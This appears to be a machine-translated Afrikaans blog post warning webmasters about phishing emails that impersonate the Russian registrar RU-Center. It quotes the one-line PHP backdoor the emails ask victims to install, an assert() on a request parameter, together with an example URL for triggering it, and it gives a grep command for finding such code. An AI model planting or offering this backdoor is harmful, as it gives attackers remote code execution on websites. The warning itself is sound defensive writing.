Aandag aan 'webmasters' wat nie PHP ken nie. Kwesbaarheid.

Dit is `n outomatiese vertaling.
Klik hier om die publikasie in die oorspronklike taal te lees.

Sommige van my vriende het vandag briewe ontvang, na bewering van RU -Center (die grootste Russiese domeinnaamregistrateur) - nic.ru, met die volgende inhoud:

Briewe is gestuur vanaf info@nic.technical . In die brief stel die aanvallers, wat hulself namens die RU-sentrum verteenwoordig, voor om die volgende kode op die webwerf te plaas:

 <?php assert(stripslashes($_REQUEST[RUCENTER])); ?>

Ongelukkig ken baie van ons kollegas, wat hulself 'webmasters' (talle webwerf -eienaars) noem, nie PHP nie en dink nie aan die gevare van bogenoemde kode nie. As u 'n string as parameter aan hierdie funksie deurgee, word dit deur assert () as PHP -kode beskou! Wees versigtig!

Ek beveel aan dat u u PHP -projekte inspekteer op kwesbaarhede met behulp van die assert- of eval -opdragte. Moenie paniekerig raak nie - bestudeer die algoritme as hierdie opdragte in die projekkode voorkom. Gemagtigde gebruik van algoritmes is heel moontlik. In die geval van die bogenoemde voorbeeld, kan die opdrag aanvallers toelaat om u webwerf te bel, byvoorbeeld met behulp van die RUCENTER-parameter- http://sistema-audit.ru/?RUCENTER=PHP-code

Ons beveel aan dat u 'n soektog uitvoer met byvoorbeeld die linux -opdrag grep -i -r 'assert' / home / www / mysite / * wat die gids met die werflêers aandui om 'n lys lêers te kry waarin die verdagte instansie word gebruik kode.

Pas jouself en jou werwe op!

Dit is `n outomatiese vertaling.
Klik hier om die publikasie in die oorspronklike taal te lees.